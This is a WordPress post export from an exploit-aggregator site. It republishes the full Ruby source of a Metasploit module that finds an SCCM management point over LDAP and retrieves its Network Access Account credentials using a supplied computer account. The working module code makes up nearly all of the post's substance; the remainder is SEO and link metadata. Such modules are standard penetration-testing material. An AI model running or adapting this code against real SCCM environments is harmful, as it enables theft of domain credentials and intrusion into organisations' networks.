{"id":15157,"date":"2025-08-29T16:42:04","date_gmt":"2025-08-29T16:42:04","guid":{"rendered":"http:\/\/localhost\/?p=15157"},"modified":"2025-08-29T16:42:04","modified_gmt":"2025-08-29T16:42:04","slug":"get-naa-credentials","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=15157","title":{"rendered":"Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-08-29T19:24:32&#8243;,&#8221;description&#8221;:&#8221;This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.        &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-29T18:53:23&#8243;,&#8221;modified&#8221;:&#8221;2025-03-04T18:55:46&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Get NAA Credentials&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n  include ::Msf::Exploit::Remote::HTTP::SCCM\\n  include Msf::Exploit::Remote::LDAP\\n  include Msf::OptionalSession::LDAP\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Get NAA Credentials&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.\\n          This requires a computer account, which can be added using the samr_account module.\\n        },\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;xpn&#8217;,     # Initial research\\n          &#8216;skelsec&#8217;, # Initial obfuscation port\\n          &#8216;smashery&#8217; # module author\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;URL&#8217;, &#8216;https:\/\/blog.xpnsec.com\/unobfuscating-network-access-accounts\/&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/subat0mik\/Misconfiguration-Manager\/blob\/main\/attack-techniques\/CRED\/CRED-2\/cred-2_description.md&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/Mayyhem\/SharpSCCM&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/garrettfoster13\/sccmhunter&#8217;]\\n        ],\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [],\\n          &#8216;SideEffects&#8217; =\\u003e [CONFIG_CHANGES],\\n          &#8216;Reliability&#8217; =\\u003e []\\n        }\\n      )\\n    )\\n\\n    register_options([\\n      OptAddressRange.new(&#8216;RHOSTS&#8217;, [ false, &#8216;The domain controller (for autodiscovery). Not required if providing a management point and site code&#8217; ]),\\n      OptPort.new(&#8216;RPORT&#8217;, [ false, &#8216;The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code&#8217;, 389 ]),\\n      OptString.new(&#8216;COMPUTER_USER&#8217;, [ true, &#8216;The username of a computer account&#8217; ]),\\n      OptString.new(&#8216;COMPUTER_PASS&#8217;, [ true, &#8216;The password of the provided computer account&#8217; ]),\\n      OptString.new(&#8216;MANAGEMENT_POINT&#8217;, [ false, &#8216;The management point (SCCM server) to use&#8217; ]),\\n      OptString.new(&#8216;SITE_CODE&#8217;, [ false, &#8216;The site code to use on the management point&#8217; ]),\\n      OptString.new(&#8216;DOMAIN&#8217;, [ true, &#8216;The domain to authenticate to&#8217;, &#8221; ])\\n    ])\\n\\n    deregister_options(&#8216;LDAPDomain&#8217;) # deregister LDAPDomain because DOMAIN is registered and used for both LDAP and HTTP\\n\\n    @session_or_rhost_required = false\\n  end\\n\\n  def find_management_point\\n    ldap_connect do |ldap|\\n      validate_bind_success!(ldap)\\n\\n      if (@base_dn = datastore[&#8216;BASE_DN&#8217;])\\n        print_status(\\&#8221;User-specified base DN: #{@base_dn}\\&#8221;)\\n      else\\n        print_status(&#8216;Discovering base DN automatically&#8217;)\\n\\n        if (@base_dn = ldap.base_dn)\\n          print_status(\\&#8221;#{ldap.peerinfo} Discovered base DN: #{@base_dn}\\&#8221;)\\n        else\\n          fail_with(Msf::Module::Failure::UnexpectedReply, \\&#8221;Couldn&#8217;t discover base DN!\\&#8221;)\\n        end\\n      end\\n      raw_objects = ldap.search(base: @base_dn, filter: &#8216;(objectclass=mssmsmanagementpoint)&#8217;, attributes: [&#8216;*&#8217;])\\n      return nil unless raw_objects.any?\\n\\n      raw_obj = raw_objects.first\\n\\n      raw_objects.each do |ro|\\n        print_good(\\&#8221;Found Management Point: #{ro[:dnshostname].first} (Site code: #{ro[:mssmssitecode].first})\\&#8221;)\\n      end\\n\\n      if raw_objects.length \\u003e 1\\n        print_warning(\\&#8221;Found more than one Management Point. Using the first (#{raw_obj[:dnshostname].first})\\&#8221;)\\n      end\\n\\n      obj = {}\\n      obj[:rhost] = raw_obj[:dnshostname].first\\n      obj[:sitecode] = raw_obj[:mssmssitecode].first\\n\\n      obj\\n    rescue Errno::ECONNRESET\\n      fail_with(Msf::Module::Failure::Disconnected, &#8216;The connection was reset.&#8217;)\\n    rescue Rex::ConnectionError =\\u003e e\\n      fail_with(Msf::Module::Failure::Unreachable, e.message)\\n    rescue Rex::Proto::Kerberos::Model::Error::KerberosError =\\u003e e\\n      fail_with(Msf::Module::Failure::NoAccess, e.message)\\n    rescue Net::LDAP::Error =\\u003e e\\n      fail_with(Msf::Module::Failure::Unknown, \\&#8221;#{e.class}: #{e.message}\\&#8221;)\\n    end\\n  end\\n\\n  def run\\n    management_point = datastore[&#8216;MANAGEMENT_POINT&#8217;]\\n    site_code = datastore[&#8216;SITE_CODE&#8217;]\\n    if management_point.blank? != site_code.blank?\\n      fail_with(Failure::BadConfig, &#8216;Provide both MANAGEMENT_POINT and SITE_CODE, or neither (to perform autodiscovery)&#8217;)\\n    end\\n\\n    if management_point.blank?\\n      begin\\n        result = find_management_point\\n        fail_with(Failure::NotFound, &#8216;Failed to find management point&#8217;) unless result\\n        management_point = result[:rhost]\\n        site_code = result[:site_code]\\n      rescue ::IOError =\\u003e e\\n        fail_with(Failure::UnexpectedReply, e.message)\\n      end\\n    end\\n\\n    opts = {\\n      &#8216;username&#8217; =\\u003e datastore[&#8216;COMPUTER_USER&#8217;],\\n      &#8216;password&#8217; =\\u003e datastore[&#8216;COMPUTER_PASS&#8217;]\\n    }\\n    computer_user = datastore[&#8216;COMPUTER_USER&#8217;].delete_suffix(&#8216;$&#8217;)\\n    get_naa_credentials(opts, management_point, site_code, computer_user)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/admin\/sccm\/get_naa_credentials.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/sccm\/get_naa_credentials\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-08-29T19:24:32&#8243;,&#8221;description&#8221;:&#8221;This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server. &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-29T18:53:23&#8243;,&#8221;modified&#8221;:&#8221;2025-03-04T18:55:46&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Get NAA Credentials&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source:&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-15157","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=15157\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-08-29T19:24:32&#8243;,&#8221;description&#8221;:&#8221;This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server. &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-29T18:53:23&#8243;,&#8221;modified&#8221;:&#8221;2025-03-04T18:55:46&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Get NAA Credentials&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##n# This module requires Metasploit: https:\/\/metasploit.com\/downloadn# Current source:...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=15157\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-29T16:42:04+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15157#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15157\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-\",\"datePublished\":\"2025-08-29T16:42:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15157\"},\"wordCount\":847,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15157#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15157\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15157\",\"name\":\"Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-29T16:42:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15157#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15157\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15157#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=15157","og_locale":"en_US","og_type":"article","og_title":"Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-08-29T19:24:32&#8243;,&#8221;description&#8221;:&#8221;This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server. &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-29T18:53:23&#8243;,&#8221;modified&#8221;:&#8221;2025-03-04T18:55:46&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Get NAA Credentials&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##n# This module requires Metasploit: https:\/\/metasploit.com\/downloadn# Current source:...","og_url":"https:\/\/zero.redgem.net\/?p=15157","og_site_name":"zero redgem","article_published_time":"2025-08-29T16:42:04+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=15157#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=15157"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-","datePublished":"2025-08-29T16:42:04+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=15157"},"wordCount":847,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=15157#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=15157","url":"https:\/\/zero.redgem.net\/?p=15157","name":"Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-29T16:42:04+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=15157#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=15157"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=15157#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15157","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15157"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15157\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15157"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15157"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}